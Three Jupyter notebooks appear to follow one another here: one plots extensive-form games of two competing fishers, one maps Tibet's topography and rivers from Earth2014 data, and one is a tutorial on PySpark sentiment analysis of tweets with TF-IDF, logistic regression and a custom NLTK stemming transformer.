```
# Default configuration
Both fishers start at the shore. They can go to one of two fishing spots. If fishers go to different spots, they stay there. If they go to the same spot, they can choose to stay or leave. If, even after then, both fishers end up at the same spot, they fight. The probability of any fisher $i$ winning the fight is given by:
\begin{equation}
P(\text{$i$ wins fight})=\frac{S_i}{\sum_j S_j}
\end{equation}
where $S_i$ denotes the strength of fisher $i$, a parameter between 1 (weakest) and 10 (strongest).
```
my_fig_kwargs = dict(figsize=(20,10), frameon=False)
my_node_kwargs = dict(font_size=10, node_size=500, edgecolors='k',
linewidths=1.5)
my_edge_kwargs = dict(arrowsize=15, width=1.5)
my_edge_labels_kwargs = dict(font_size=10)
my_patch_kwargs = dict(linewidth=2)
my_legend_kwargs = dict(fontsize=16, loc='upper right', edgecolor='white')
my_info_sets_kwargs = dict(linestyle='--', linewidth=3)
position_colors = {'alice':'aquamarine', 'bob':'greenyellow'}
game = build_full_game('.', 'fishers', threshold=0)
fig = plot_game(game,
position_colors,
fig_kwargs=my_fig_kwargs,
node_kwargs=my_node_kwargs,
edge_kwargs=my_edge_kwargs,
edge_labels_kwargs=my_edge_labels_kwargs,
patch_kwargs=my_patch_kwargs,
legend_kwargs=my_legend_kwargs,
draw_utility=False,
info_sets_kwargs=my_info_sets_kwargs)
# fig.savefig('fishers_default.png', bbox_inches='tight', dpi=500)
```
# *First-in-time, first-in-right* configuration
Now fishers also start from the shore, but if they go to the same fishing spot, the fisher who gets there first is commited to the spot, while the fisher who has lost the race has to leave. The probability that fisher $i$ wins the race if both fishers go to the same spot is:
\begin{equation}
P(\text{$i$ wins race}) = \frac{V_i}{\sum_j V_j}
\end{equation}
where $V_i$ denotes the speed of fisher $i$, a parameter between 1 (slowest) and 10 (fastest).
```
game = build_full_game('.', 'fishers', threshold=1)
fig = plot_game(game,
position_colors,
fig_kwargs=my_fig_kwargs,
node_kwargs=my_node_kwargs,
edge_kwargs=my_edge_kwargs,
edge_labels_kwargs=my_edge_labels_kwargs,
patch_kwargs=my_patch_kwargs,
legend_kwargs=my_legend_kwargs,
draw_utility=False,
info_sets_kwargs=my_info_sets_kwargs)
# fig.savefig('fishers_race.png', bbox_inches='tight', dpi=200)
```
# *First-to-announce, first-in-right* configuration
In this configuration, one of the fishers is randomly assigned to the position of announcer. When both fishers are in the shore, anyone can go to any spot before the announcer has declared to one spot. Then, both fishers can go to any of the spots. If the fishers both go the spot that the announcer has declared, the announcer is guaranted to win the race to the spot. If the fishers both go to the spot that has not been declared by the announcer, any of them might win the race to get there. The winner of the race is commited to the spot (she stays) while the looser has to leave.
Note that the rules for this configuration are *in addition* to the *first-in-time, first-in-right* rules, and they have been assigned priority 2 (*first-in-time, first-in-right* rules where assigned priority 1, and the default rules were assigned priority 0, as usual).
```
game = build_full_game('.', 'fishers', threshold=2)
my_fig_kwargs = dict(figsize=(20,14), frameon=False)
fig = plot_game(game,
position_colors,
fig_kwargs=my_fig_kwargs,
node_kwargs=my_node_kwargs,
edge_kwargs=my_edge_kwargs,
edge_labels_kwargs=my_edge_labels_kwargs,
patch_kwargs=my_patch_kwargs,
legend_kwargs=my_legend_kwargs,
draw_utility=False,
info_sets_kwargs=my_info_sets_kwargs)
# fig.savefig('fishers_announce.png', bbox_inches='tight', dpi=200)
game.node_info
```
| github_jupyter |
# Topopgraphy and rivers map of region (Tibet)
### Database
- [Earth2014](http://ddfe.curtin.edu.au/models/Earth2014/) (Arc‐min shape, topography, bedrock and ice‐sheet models)
### Package
- [Cartopy](https://scitools.org.uk/cartopy/docs/latest/) (A mapping and imaging package originating from the Met. Office in the UK)
Here downloads [Earth2014.TBI2014.5min.geod.bin](http://ddfe.curtin.edu.au/models/Earth2014/data_5min/topo_grids/)
```
import numpy as np
import os
import pyshtools as pysh
import cartopy
import cartopy.crs as ccrs
import cartopy.feature as cfeature
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import cm
%matplotlib inline
#from matplotlib.colors import LightSource
#from mpl_toolkits.axes_grid1 import make_axes_locatable
dir_db = '../data/earth2014/data_5min/topo_grids'
fname_db = 'Earth2014.TBI2014.5min.geod.bin'
fname_save = 'Earth2014.TBI2014.5min'
fname_topo = os.path.join(dir_db,fname_db)
# This scirpt shows how to access the data grids of earth2014 model
# Source code: access_Earth2014_grids5min.m (Christian Hirt, Moritz Rexer)
# grid definitions
res_deg = 5/60 # 5min data
extent_global = [-180, 180, -90, 90]
minlon,maxlon,minlat,maxlat = extent_global
lats = np.arange((minlat+res_deg/2),(maxlat-res_deg/4),res_deg)
lons = np.arange((minlon+res_deg/2),(maxlon-res_deg/4),res_deg)
nlat = len(lats)
nlon = len(lons)
order_db = nlat
minlon1,maxlon1,minlat1,maxlat1 = (lons.min(),lons.max(),lats.min(),lats.max())
extent_earth2014 = [minlon1,maxlon1,minlat1,maxlat1]
# read data
data_topo = np.fromfile(fname_topo, dtype='>i2').reshape((nlat, nlon))
data_topo = data_topo.astype(np.int16) # data = data.astype('<i2')
data_topo = np.flipud(data_topo)
# get SHCs
topo = pysh.SHGrid.from_array(data_topo)
coeffs = pysh.expand.SHExpandDH(topo.data, sampling=2)
```
# Map
```
name_area ='Tibet'
extent_area = [65,110,15,45]
# TRR (88,108,20,36)
order_s = order_db
order_tRange = [1080,20]
#order_tRange = [2160,1080,720,540,360,240,120,80,40,30,20,15,10]
#order_tRange = [15,10,5,3,2,1]
# cartopy parameters
rivers = cfeature.NaturalEarthFeature('physical', 'rivers_lake_centerlines', '50m',
edgecolor='Blue', facecolor="none")
coastline = cfeature.NaturalEarthFeature('physical', 'coastline', '50m',
edgecolor=(0.0,0.0,0.0),
facecolor="none")
lakes = cfeature.NaturalEarthFeature('physical', 'lakes', '50m',
edgecolor="blue", facecolor="blue")
prj_base = ccrs.PlateCarree()
# plot parameters
extent_img = extent_earth2014
extent_fig = extent_area
xticks = np.arange(-180,210,5)
yticks = np.arange(-90,120,5)
dpi = 100
save_mode = True
arrow_width = 0.001
arrow_scale = 50000
# cmap = cm.terrain
# norm = matplotlib.colors.Normalize(vmin=-4e3, vmax=8e3)
!git clone https://github.com/shaharkadmiel/cmaptools
from cmaptools.cmaptools import readcpt, joincmap, DynamicColormap
# https://github.com/shaharkadmiel/cmaptools
#from cmaptools import readcpt, joincmap, DynamicColormap
cptfile1 = '../data/cpt/seafloor.cpt'
cmap1 = readcpt(cptfile1)
cptfile2 = '../data/cpt/dem2.cpt'
cmap2 = readcpt(cptfile2)
cmap = joincmap(cmap1, cmap2)
cmap.set_range(-4e3, 8e3)
norm = cmap.norm
# cptfile = 'mby.cpt'
# cmap = readcpt(cptfile)
# cmap.set_range(-4e3, 8e3)
# norm = cmap.norm
for i in range(0,len(order_tRange)):
# filter by processing SHCs
order_t = order_tRange[i]
lmax = int(order_t+1)
coeffs_f = coeffs.copy()
coeffs_f[:, lmax:, :] = 0.
topo_f = pysh.expand.MakeGridDH(coeffs_f, sampling=2)
# plot parameters
#data_img = np.flipud(topo_f.copy()) # in local
data_img = topo_f.copy() # in binder
order_img = order_t
fname_fig = name_area + '_'+ fname_save + '.order'+ str(order_img) + '_Rivers'
# res_d = int(res/res_t)
res_dy = 10
res_dx = 10
y = lats[::res_dy]
x = lons[::res_dx]
X,Y = np.meshgrid(x,y)
ZZ = data_img.copy()
ZZ[ZZ<-500.0] = -500.0
ZZ = ZZ[::res_dy,::res_dx]
UY,UX= np.gradient(-ZZ)
UX = UX.reshape((X.shape[0],X.shape[1]))
UY = UY.reshape((X.shape[0],X.shape[1]))
# mask = ZZ > -500.0
# X_A=X[mask]
# Y_A=Y[mask]
# UX_A=UX[mask]
# UY_A=UY[mask]
fig = plt.figure(figsize=(10, 10), facecolor="none")
ax = plt.axes(projection=prj_base)
#ax.axis(extent_fig)
ax.set(xlabel='Longitude', ylabel='Latitude', yticks=yticks, xticks=xticks)
ax.minorticks_on()
ax.set_title(fname_fig)
ax.set_extent(extent_fig)
# data_img2 = data_img.copy()
# data_img2[abs(data_img-0)< 10.] = 10.
im = ax.imshow(data_img, extent=extent_img,cmap=cmap,norm=norm) #,transform=prj_base)
ax.streamplot(X, Y, UX, UY, density=1.0, color='#883300',zorder = 2)
#ax.quiver(X_A,Y_A,UX_A,UY_A,width=arrow_width,scale=arrow_scale,zorder = 3)
#ax.contour(X,Y,ZZ, zorder = 4)
# divider = make_axes_locatable(ax)
# cax = divider.append_axes("right", size="5%", pad=0.05)
# cbar=plt.colorbar(im, cax=cax)
# cbar.set_label('Elevation [m]')
ax.add_feature(coastline, linewidth=1.5, edgecolor="Black", zorder=5)
ax.add_feature(rivers, linewidth=1.0, edgecolor="#0077FF", zorder=6)
ax.add_feature(lakes, linewidth=0, edgecolor="Blue", facecolor="#4477FF", zorder=7, alpha=0.5)
if save_mode == True:
plt.savefig((fname_fig+'.png'),dpi=dpi)
plt.show()
```
| github_jupyter |
# Sentiment Analysis, Part 2:
Machine Learning With Spark On Google Cloud
---------------
__[1. Introduction](#bullet1)__
__[2. Creating A GCP Hadoop Cluster ](#bullet2)__
__[3. Getting Data From An Atlas Cluter](#bullet3)__
__[4. Basic Models With Spark ML Pipelines](#bullet4)__
__[5. Stemming With Custom Transformers](#bullet5)__
__[6. N-Grams & Parameter Tunning Using A Grid Search](#bullet6)__
__[7. Conclusions](#bullet7)__
## Introduction <a class="anchor" id="bullet1"></a>
--------------
In the <a href="http://michael-harmon.com/blog/SentimentAnalysisP1.html">first part</a> of this two part blog post I went over the basics of ETL with PySpark and MongoDB. In this second part I will go over the actual machine learning aspects of sentiment analysis using <a href="https://spark.apache.org/docs/latest/ml-guide.html">SparkML</a> (aka MLlib, it seems the name is changing). Specifically, we'll be using <a href="https://spark.apache.org/docs/latest/ml-pipeline.html">ML Pipelines</a> and <a href="https://en.wikipedia.org/wiki/Logistic_regression">Logistic Regression</a> to build a basic linear classifier for sentiment analysis. Many people use Support Vector Machines (SVM) because they handle high dimensional data well (which NLP problems definitely are) and allow for the use of non-linear kernels. However, given the number of samples in our dataset and the fact Spark's <a href="https://spark.apache.org/docs/2.3.2/ml-classification-regression.html#linear-support-vector-machine">SVM</a> only supports linear Kernels (which have comparable performance to logistic regression) I decided to just stick with the simpler model, aka logistic regression.
After we build a baseline model for sentiment analysis, I'll introduce techniques to improve performance like removing stop words and using N-grams. I also introduce a custom Spark <a href="https://spark.apache.org/docs/1.6.2/ml-guide.html#transformers">Transformer</a> class that uses the <a href="https://www.nltk.org/">NLTK</a> to perform stemming. Lastly, we'll review <a href="https://spark.apache.org/docs/latest/ml-tuning.html">hyper-parameter tunning</a> with cross-validation to optimize our model. The point of this post *is not too build the best classifier on a huge dataset, but rather to show how to piece together advanced concepts using PySpark... and at the same time get reasonable results.*
That said we will continue to use the 1.6 million <a href="https://www.kaggle.com/kazanova/sentiment140">tweets</a> from Kaggle which I loaded into my <a href="https://www.mongodb.com/cloud/atlas">Atlas MongoDB</a> cluster with the Spark ETL job that was discussed in the previous <a href="http://michael-harmon.com/blog/SentimentAnalysisP1.html">post</a>. While 1.6 million tweets doesn't necessitate a distributed environment, using PySpark on this datset was a little too much for my whimpy 2013 Macbook Air and I needed to use a more powerful machine. Luckily <a href="https://cloud.google.com/">Google Cloud Platform</a> (GCP) gives everyone free credits to start using their platform and I was able to use Spark on a <a href="https://hadoop.apache.org/">Hadoop</a> cluster using <a href="https://cloud.google.com/dataproc/">dataproc</a> and <a href="https://cloud.google.com/datalab/">datalab</a>.
Let's get started!
## Creating A GCP Hadoop Cluster <a class="anchor" id="bullet2"></a>
---------
I have been using Hadoop and Spark for quite some time now, but have never spun up my own cluster and gained a new found respect for Hadoop admins. While Google does make the process easier, I still had to ask a friend for help to get things to work the way I wanted them to. Between getting the correct version of Python as well as the correct version of NLTK on both the driver and worker nodes, the correct MongoDB connection for PySpark 2.3.2 and the time it takes to spin up and spin down a cluster I was very much done configuting Hadoop clusters on my own. I want to say that made me a better person or at least a better data scientist, but I'm not so sure. :)
To start up the Hadoop cluster with two worker nodes (with the GCP free trial I could only use two worker nodes) I used the command below:

You can see dataproc image version, the string for the MongoDB connection, as well as the version of Python in the above commands. The bash scripts that I reference in my Google storage bucket for this project can be obtain from my repo <a href="https://github.com/mdh266/SentimentAnalysis/tree/master/GCP">here</a>. After the cluster is created we can ssh onto the master node by going to the console and clicking on "*Compute Engine*" tab. You will see a page like the one below:

We can ssh on the master node using the ssh tab to the right of the instance named **mikescluster-m**. The "-m" signifies it is the master node while the other instances have "-w" signifiying they are worker nodes. After connecting to the mater node you can see all the <a href="https://data-flair.training/blogs/top-hadoop-hdfs-commands-tutorial/">Hadoop commands</a> available:

We won't work on our Hadoop cluster through command line, but rather connect to the cluster through Jupyter notebooks using Google <a href="https://cloud.google.com/datalab/">datalab</a>. To do this involves creating an ssh-tunnel and proxy for Chrome, both of which I had no idea how to do, but luckily the same friend from before walked me through it. The bash scripts I used to do these last two procedures are located in my repo <a href="https://github.com/mdh266/SentimentAnalysis/tree/master/GCP">here</a>. After those steps were completed we can enter the address into our web browser to see the Jupyter notebooks,
http://mikescluster-m:8080
Note that the notebooks are running on the master node using port 8080 and that <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html">YARN</a> can be seen from the same web address, but using port 8088. I'll come back to YARN a little later. Now that we have our Hadoop cluster up and running on Google Cloud we can talk about how to access our data.
## Getting The Dataset From An Atlas Cluster <a class="anchor" id="bullet3"></a>
---------
As I mentioned in the introduction I loaded the cleaned Twitter dataset into my Atlas MongoDB cluster as I discussed in the previous <a href="http://michael-harmon.com/blog/SentimentAnalysisP1.html">post</a>. In this post I won't go over the ETL process again, but will show how to connect PySpark to the Atlas cluster. One thing to highlight here is that in order to keep my collection within the memory limits of the free tier I had to store the data as strings instead of tokens as I showed in the previous post. (See the ETL job here <a href="https://github.com/mdh266/SentimentAnalysis/blob/master/ETL/BasicETL.py">here</a> for details) Therefore we'll do have to tokenize our strings again here.
The first step to connecting to the database is to create a connection url string that contains the cluster address, user info, password as well as database and collection name in the dictionary below:
```
mongo_conn = {"address" : "harmoncluster-xsarp.mongodb.net/",
"db_name" : "db_twitter",
"collection" : "tweets",
"user" : "",
"password" : ""}
url = "mongodb+srv://{user}:{password}@{address}{db_name}.{collection}".format(**mongo_conn)
```
Then we create a dataframe from the documents in the collection using the <code>spark.read</code> command, passing in the connection url as our option and specifying that we are using MongoDB as the format:
```
df = spark.read\
.format("com.mongodb.spark.sql.DefaultSource")\
.option("uri",url)\
.load()
```
At this point while the collection on the Atlas cluster has not been pulled to our Hadoop cluster yet, we would see an error if there was a mistake in our connection string. Additionally, at this point the dataframe allows us to see some metadata on the collection, i.e. the "schema",
```
df.printSchema()
```
You can see that each document has an <code>id</code>, <code>sentiment</code> and cleaneed tweet. Let's just pull the <code>tweet_clean</code> as well as `sentiment` fields and rename `sentiment` to `label`:
```
df2 = df.select("tweet_clean","sentiment")\
.withColumnRenamed("sentiment", "label")
```
Then let's split the dataframe into training and testing sets (using 80% of the data for training and 20% for testing) with a seed (1234),
```
train, test = df2.randomSplit([0.80, 0.20], 1234)
```
Now we can look at the number of tweets in the training set that have positive and negative sentiment. Note, since we will be using this dataframe many times below we will cache it to achieve better runtime performance.
```
train.cache()
train.groupby("label")\
.count()\
.show()
```
We can see that the two classes are well balanced, with over half a million positive and negative teets. We do the same for the testing set:
```
test.cache()
test.groupby("label")\
.count()\
.show()
```
Again, the classes are well balanced. This is great because we don't have to worry about dealing with imbalanced classes and *accuracy and ROC's area under the curve (AUC) are good metrics to see how well our models are performing.*
Now let's build our baseline model.
## Basic Models With Spark ML Pipelines <a class="anchor" id="bullet4"></a>
------------
In this section I'll go over how to build a basic logistic regression model using Spark <a href="https://spark.apache.org/docs/latest/ml-pipeline.html">ML Pipelines</a>. ML Pipelines are similar to <a href="https://scikit-learn.org/stable/modules/generated/sklearn.pipeline.Pipeline.html">Scikit-learn Pipelines</a>. We import the basic modules:
```
from pyspark.ml import Pipeline
from pyspark.ml.feature import Tokenizer, HashingTF, IDF
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.evaluation import BinaryClassificationEvaluator
```
Next we instantiate our classification evalutor class and pass the label of the output column (the prediction column) from the model:
```
evaluator = BinaryClassificationEvaluator(rawPredictionCol="rawPrediction")
# get the name of the metric used
evaluator.getMetricName()
```
We'll be using the <a href="https://en.wikipedia.org/wiki/Bag-of-words_model">bag of words (BOW) model</a> to build features from tweets for our model. *In the bag-of-words model, a document (in this case tweet) is represented as "bag" or list of its words, disregarding grammar and ordering, but keeping the multiplicity of the words.* A two document example is:
- **D1:** Hi, I am Mike and I like Boston.
- **D2:** Boston is a city and people in Boston like the Red Sox.
From these two documents, a list, or 'bag-of-words' is constructed
bag = ['Hi', 'I', 'am', 'Mike', 'and', 'like', 'Boston', 'is',
'a', 'city, 'and', 'people', 'in', 'the', 'red', 'sox]
Notice how in our bag-of-words we have dropped repetitions of the words 'I', 'is' and 'Mike'. I will show how multiplicity of words enters into our model next.
After transforming the text (all documents) into a "bag of words" we generate a vector for each document that represents the number of times each word (or more generally token) in the BOW appears in the text. The order of entries in the BOW vector corresponds to the order of the entries in the bag-of-words list. For example, document D1 would have a vector,
[1, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0 ,0, 0, 0, 0, 0]
while the second document, D2, would have the vector,
[0, 0, 0, 0, 0, 0, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1]
Each entry of the lists refers to frequency or count of the corresponding entry in the bag-of-words list. When we have a stacked collection of (row) vectors, or matrix, where each row corresponds to a document (vector), and each column corresponds to a word in the bag-of-words list, then this will be known as our **term-frequency ($\text{tf}$) [document matrix](https://en.wikipedia.org/wiki/Document-term_matrix)**. The general formula for an entry in the $\text{tf}$ matrix is,
$$\text{tf}(d,t) \, = \, f_{t,d}$$
where $f_{t,d}$ is the number of times the term $t$ occurs in document $d \in \mathcal{D}$, where $\mathcal{D}$ is our text corpus. We can create a term-frequency matrix using Spark's <a href="https://spark.apache.org/docs/latest/ml-features.html#tf-idf">HashingTF</a> class. To see the difference between HashingTF and <a href="https://spark.apache.org/docs/latest/ml-features.html#countvectorizer">CounterVectorizer</a> see this <a href="https://stackoverflow.com/questions/35205865/what-is-the-difference-between-hashingtf-and-countvectorizer-in-spark">stackoverflow post</a>.
Most often term-frequency alone is not a good measure of the importance of a word/term to a document's sentiment. Very common words like "the", "a", "to" are almost always the terms with the highest frequency in the text. Thus, having a high raw count of the number of times a term appears in a document does not necessarily mean that the corresponding word is more important to the sentiment of the document.
To circumvent the limination of term-frequency, we often normalize it by the **inverse document frequency (idf)**. This results in the **term frequency-inverse document frequency (tf-idf)** matrix. The *inverse document frequency is a measure of how much information the word provides, that is, whether the term is common or rare across all documents in the corpus*. We can give a formal defintion of the inverse-document-frequency by letting $\mathcal{D}$ be the corpus or the set of all documents and $N_{\mathcal{D}}$ is the number of documents in the corpus and $N_{t,D}$ be the number of documents that contain the term $t$ then,
$$idf(t,\mathcal{D}) \, = \, \log\left(\frac{N_{\mathcal{D}}}{1 + N_{t,\mathcal{D}}}\right) \, = \, - \log\left(\frac{1 + N_{t,\mathcal{D}}}{N_{\mathcal{D}}}\right) $$
The reason for the presence of the $1$ is for smoothing. Without it, if the term/word did not appear in any training documents, then its inverse-document-frequency would be $idf(t,\mathcal{D}) = \infty$. However, with the presense of the $1$ it will now have $idf(t,\mathcal{D}) = 0$.
Now we can formally define the term frequnecy-inverse document frequency as a normalized version of term-frequency,
$$\text{tf-idf}(t,d) \, = \, tf(t,d) \cdot idf(t,\mathcal{D}) $$
Like the term-frequency, the term frequency-inverse document frequency is a sparse matrix, where again, each row is a document in our training corpus ($\mathcal{D}$) and each column corresponds to a term/word in the bag-of-words list. The $\text{tf-idf}$ matrix can be constructed using the <a href="https://spark.apache.org/docs/latest/ml-features.html#tf-idf">SparkML IDF</a> class.
Now that we have gotten the definition of TF-IDF out of the way we can discuss the steps in building a basic pipeline. These include,
- tokenization
- creating term frequency
- creating term frequency inverse document frequency
- fitting a logistic regression model to the BOW created from the previous steps
This is all done (amazingly!) in the short few lines below:
```
# create tokens from tweets
tk = Tokenizer(inputCol= "tweet_clean", outputCol = "tokens")
# create term frequencies for each of the tokens
tf1 = HashingTF(inputCol="tokens", outputCol="rawFeatures", numFeatures=1e5)
# create tf-idf for each of the tokens
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=2.0)
# create basic logistic regression model
lr = LogisticRegression(maxIter=20)
# create entire pipeline
basic_pipeline = Pipeline(stages=[tk, tf1, idf, lr])
```
The setting `numFeatures=1e5` means that our bag-of-words "vocabulary" contains 100,000 words (see above listed stackeroverflow comment for explanation of what this means). The filter `minDocFreq=2.0` requires that a word or token must appear a minimum of 2 documents to be counted as a feature (column). **This parameter can act as form a of regularization. Setting this value to larger integers increases the regularization by reducing the number of words we consider.** This helps to combat overfitting by eliminating words which occur very rarely so that they do not influence our model.
Now we can execute the entire pipleine of tokenization, feature extraction (tf-idf) and train the model all with the following command:
```
model1 = basic_pipeline.fit(train)
```
Once we have trained the pipeline model we can predict it's perfromance on the testing set using the <code>transform</code> method and the <code>evaluate</code> method of the evaluator object.
```
# predict on test set
predictions1 = model1.transform(test)
# get the performance on the test set
score1 = evaluator.evaluate(predictions1)
print("AUC SCORE: {}".format(score1))
```
We can also get the accuracy on the testing set. I couldn't really find any good documentation about how to do this without using the old MLlib (RDD based) library. What made this process even more confusing is that I had to use <a href="https://spark.apache.org/docs/2.3.2/mllib-evaluation-metrics.html">MulticlassMetrics</a> class to evualate the binary outcome ( the `BinaryClassificationMetrics` class only had area under the curve (AUC) and for ROC curve and AUC for Precision-Recall curve). The code snippet to get the accuracy on the testing set is:
```
predictedAndLabels = predictions1.select(["prediction","label"])\
.rdd.map(lambda r : (float(r[0]), float(r[1])))
from pyspark.mllib.evaluation import MulticlassMetrics
metrics = MulticlassMetrics(predictedAndLabels)
print("Test Set Accuracy: {}".format(metrics.accuracy))
```
A score of 0.885 for the AUC of the ROC curve and 81% accuracy is pretty good for Twitter sentiment analyis, but let's see if we can make any improvements using more techniques from natural language processing.
### Removing Stop Words
One trick people use as a prepocessing step in NLP is to remove stop words, i.e. common words that do not add any additional information into the model. Examples of stop words are: 'a', 'the', 'and', etc. We will remove stops from our tokens by using the <a href="https://spark.apache.org/docs/2.3.2/ml-features.html#stopwordsremover">StopWordsRemover</a> class. We import it below,
```
from pyspark.ml.feature import StopWordsRemover
```
Then instantiate a new StopWordsRemover object setting input column to be result of the tokenization procedure. Notice that the input column name for the HashingTF object is the same as the output column name for the StopWordRemover:
```
sw = StopWordsRemover(inputCol="tokens", outputCol="filtered")
tf2 = HashingTF(inputCol="filtered", outputCol="rawFeatures", numFeatures=1e5)
```
We can define our pipeline, train the new model and evaluate its performance on the testing set:
```
sw_pipleline = Pipeline(stages=[tk, sw, tf2, idf, lr])
model2 = stopwords_pipleline.fit(train)
predictions2 = model2.transform(test)
score2 = evaluator.evaluate(predictions2)
print("AUC SCORE: {}".format(score2))
```
Notice how easy it was to add a new stage to our ML Pipeline model!
We can see that the AUC for our ROC went down by a little over 1.5%. At first I was pretty puzzled by this and spent a lot of time trying to fix it only to learn that blindly removing stop words isn't always the best practice for sentiment analysis, especially when it comes to <a href="http://www.lrec-conf.org/proceedings/lrec2014/pdf/292_Paper.pdf">tweets</a>. Since removing stopped words gave our model worse performanace, we won't use it going forward. However, it's worthwhile to see examples of the words that were removed:
```
predictions2.select(["tweet_clean","tokens","filtered"]).show(5)
```
We can see that words like, 'a', 'and', 'was', and 'both' were removed. Removing stop words is more helpful for the case of <a href="http://michael-harmon.com/blog/NLP.html">document classification</a>, where often the class a document belongs to is determined by a few key words and removing stop words can help to understand what those key words are.
## Stemming With Customer Tranformers <a class="anchor" id="bullet5"></a>
------------
Another technique for preprocessing in NLP is stemming. We will use the Natural Language Tool Kit (<a href="https://www.nltk.org/">NLTK</a> ) with the Porter Stemmer for stemming. Stemming is the process of reducing words down to their root; for example from Wikipedia:
...the Porter algorithm reduces, argue, argued, argues, arguing, and argus all get reduced to the stem argu
Stemming is used as an approximate method for grouping words with a similar basic meaning together. For NLP and the bag-of-words model this reduces the dimension of our feature space since variations in words that would normally be counted seperately are reduced to one word that is counted collectively.
For some reason gcloud kept installing the wrong version of NLTK and inorder to get the correct version on both the driver and the workers I had to install within the notebook.
```
%sh
pip install -U nltk==3.4
```
Now we can import the NLTK to and check its version is correct.
```
import nltk
print(nltk.__version__)
from nltk.stem.porter import PorterStemmer
```
Before we dive into using NLTK with PySpark let's go over an example how stemming with the NLTK works on a simple sentence. First we instantiate the PorterStemmer object and tokenize a sentence:
```
stemmer = PorterStemmer()
tokens = "my feelings having studied all day".split(" ")
print("raw tokens: {}".format(tokens))
```
Then we can apply the stemmer's stem function to each token in the array:
```
tokens_stemmed = [stemmer.stem(token) for token in tokens]
print("clean tokens: {}".format(tokens_stemmed))
```
We can see that the word 'feelings' has been reduced to 'feel', 'having' to 'has' and 'studied' to 'studi'. I should note that stemming, like stop word removal, might not always be helpful in deciding the sentiment since the way a word is used might effect the sentiment.
Inorder to use the Porter stemmer within a ML Pipeline we must create a custom <a href="https://spark.apache.org/docs/latest/ml-pipeline.html#transformers">Transformer</a>. The Transformer class will allow us to apply non-Spark functions and transformations as stages within our ML Pipeline. We create a customer `PortersStemming` class which extends the PySpark's Transformer class, HasInputCol class and HasOutputCol class; see <a href="https://github.com/apache/spark/blob/master/python/pyspark/ml/param/shared.py">here</a> for these class definitions. This was also the first time I have used <a href="https://www.programiz.com/python-programming/multiple-inheritance">multiple inheritence</a> in Python which is pretty cool!
```
from pyspark import keyword_only
import pyspark.sql.functions as F
from pyspark.sql import DataFrame
from pyspark.sql.types import ArrayType, StringType
from pyspark.ml import Transformer
from pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param
class PorterStemming(Transformer, HasInputCol, HasOutputCol):
"""
PosterStemming class using the NLTK Porter Stemmer
This comes from https://stackoverflow.com/questions/32331848/create-a-custom-transformer-in-pyspark-ml
Adapted to work with the Porter Stemmer from NLTK.
"""
@keyword_only
def __init__(self,
inputCol : str = None,
outputCol : str = None,
min_size : int = None):
"""
Constructor takes in the input column name, output column name,
plus the minimum legnth of a token (min_size)
"""
# call Transformer classes constructor since were extending it.
super(Transformer, self).__init__()
# set Parameter objects minimum token size
self.min_size = Param(self, "min_size", "")
self._setDefault(min_size=0)
# set the input keywork arguments
kwargs = self._input_kwargs
self.setParams(**kwargs)
# initialize Stemmer object
self.stemmer = PorterStemmer()
@keyword_only
def setParams(self,
inputCol : str = None,
outputCol : str = None,
min_size : int = None
) -> None:
"""
Function to set the keyword arguemnts
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
def _stem_func(self, words : list) -> list:
"""
Stemmer function call that performs stemming on a
list of tokens in words and returns a list of tokens
that have meet the minimum length requiremnt.
"""
# We need a way to get min_size and cannot access it
# with self.min_size
min_size = self.getMinSize()
# stem that actual tokens by applying
# self.stemmer.stem function to each token in
# the words list
stemmed_words = map(self.stemmer.stem, words)
# now create the new list of tokens from
# stemmed_words by filtering out those
# that are not of legnth > min_size
filtered_words = filter(lambda x: len(x) > min_size, stemmed_words)
return list(filtered_words)
def _transform(self, df: DataFrame) -> DataFrame:
"""
Transform function is the method that is called in the
MLPipleline. We have to override this function for our own use
and have it call the _stem_func.
Notice how it takes in a type DataFrame and returns type Dataframe
"""
# Get the names of the input and output columns to use
out_col = self.getOutputCol()
in_col = self.getInputCol()
# create the stemming function UDF by wrapping the stemmer
# method function
stem_func_udf = F.udf(self._stem_func, ArrayType(StringType()))
# now apply that UDF to the column in the dataframe to return
# a new column that has the same list of words after being stemmed
df2 = df.withColumn(out_col, stem_func_udf(df[in_col]))
return df2
def setMinSize(self,value):
"""
This method sets the minimum size value
for the _paramMap dictionary.
"""
self._paramMap[self.min_size] = value
return self
def getMinSize(self) -> int:
"""
This method uses the parent classes (Transformer)
.getOrDefault method to get the minimum
size of a token.
"""
return self.getOrDefault(self.min_size)
```
After looking at the PySpark <a href="https://github.com/apache/spark/blob/master/python/pyspark/ml/base.py">source code</a> I learned that the Tranformer class is an <a href="https://docs.python.org/3/glossary.html#term-abstract-base-class">abstract base class</a> that specifically requires users to override the <code>_transform</code> method. After a lot of trial and error I found that the key steps to creating a custom transformer are:
- Creating a <code>Param</code> object (see <a href="https://github.com/apache/spark/blob/master/python/pyspark/ml/param/__init__.py">here</a> for class definition) for each paramster in the constructor that will hold the user defined parameter names, values and default values.
- Create the `_input_kwargs` member variable and set it.
- Write a new defintion for the <code>_transform</code> method that applies a customer transformation to the <code>inputCol</code> of the dataframe and returns the same dataframe with a new column named <code>outputCol</code> that is the result of the transformation defined in this code block.
I was also was curious about the <code>keyword_only</code> decorator and after <a href="http://spark.apache.org/docs/2.2.0/api/python/_modules/pyspark.html">digging deeper</a> found it is "a decorator that forces keyword arguments in the wrapped method and saves actual input keyword arguments in `_input_kwargs`."
### Stemming with the NLTK's PorterStemmer
Let's apply stemming to our problem without removing stop words to see if it improves the performance of our model.
```
stem2 = PorterStemming(inputCol="tokens", outputCol="stemmed")
```
We'll do things a little differently this time for the sake of runtime performance. Stemming is an expensive operation because it requires the use of a custom transformer. Anytime we introduce custom functions like UDFs or special Python functions outside of the SparkSQL functions we pay a runtime <a href="https://medium.com/teads-engineering/spark-performance-tuning-from-the-trenches-7cbde521cf60">penalty</a>. Therefore we want to be performing operations with custom functions as little as possible.
Since we will use stemming on multiple different models we will create new training and testing datasets that are already pre-stemmed. This avoids repeatedly having to tokenize and stem our datasets each time we train and test one of our models. We define a pipeline for creating the new datatset below,
```
stem_pipeline = Pipeline(stages= [tk, stem2]).fit(train)
```
Then we transform the training and testing set and cache them so they are in memory and can be used without having to recreate them,
```
